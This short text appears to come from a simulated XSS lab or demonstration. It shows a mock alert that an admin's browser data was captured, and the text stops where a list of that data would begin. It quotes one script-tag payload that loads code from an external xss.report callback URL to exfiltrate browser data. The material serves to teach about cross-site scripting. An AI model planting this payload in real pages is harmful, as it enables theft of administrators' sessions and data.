Simulating xss.report notification · Admin browser data captured
Admin's browser data has been exfiltrated.
In a real attack, this payload (<script src=//xss.report/c/attacker></script>) would send all of the following to the attacker's callback server.